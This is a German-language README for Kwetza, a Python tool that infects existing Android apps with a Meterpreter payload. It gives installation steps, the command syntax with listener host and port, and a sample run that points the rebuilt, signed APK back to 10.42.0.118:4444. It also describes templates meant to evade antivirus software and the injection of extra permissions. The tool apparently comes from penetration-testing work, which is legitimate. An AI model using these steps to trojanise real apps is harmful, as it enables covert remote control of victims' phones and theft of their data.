
Python-Skript zum Injizieren eines Meterpreter-Payloads in bestehende Android-Anwendungen.
Von Chris Le Roy (@brompwnie) [email protected]
Kwetza ist ein Werkzeug, mit dem Sie eine bestehende Android-Anwendung mit einem Meterpreter-Payload infizieren können.
Kwetza infiziert eine bestehende Android-Anwendung entweder mit benutzerdefinierten oder Standard-Payload-Vorlagen, um eine Erkennung durch Antivirensoftware zu vermeiden. Kwetza ermöglicht es Ihnen, Android-Anwendungen mit den Standardberechtigungen der Zielanwendung zu infizieren oder zusätzliche Berechtigungen zu injizieren, um zusätzliche Funktionalität zu erhalten.
Die von Kwetza automatisierten manuellen Schritte finden Sie hier: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/
Zuerst den Code holen:
git clone https://github.com/sensepost/kwetza.git
Kwetza ist in Python geschrieben und benötigt BeautifulSoup, das mit Pip installiert werden kann:
pip install beautifulsoup4
Kwetza erfordert, dass Apktool installiert und über Ihren PATH zugänglich ist. Dies kann mit den Installationsanweisungen eingerichtet werden, die sich hier befinden: https://ibotpeaches.github.io/Apktool/install
python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.
###########################################
[+] L00t located at hackme/dist/hackme.apk
Kwetza wurde für die Arbeit mit Python 2 entwickelt.
Standardmäßig verwendet Kwetza die Vorlage und den Keystore im Ordner "payload", um die infizierte APK zu injizieren und zu signieren.
Wenn Sie die infizierte Anwendung mit Ihrem eigenen Zertifikat signieren möchten, generieren Sie einen neuen Keystore und legen Sie ihn im Ordner "payload" ab und benennen Sie ihn in den vorhandenen Keystore um oder ändern Sie den Verweis in der kwetza.py.
Das gleiche kann für Payload-Vorlagen gemacht werden.
Das Passwort für den Standard-Keystore ist, na ja, "password".
Kwetza ist lizenziert unter einer Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0).
Berechtigungen, die über den Rahmen dieser Lizenz hinausgehen, sind möglicherweise unter http://sensepost.com/contact erhältlich.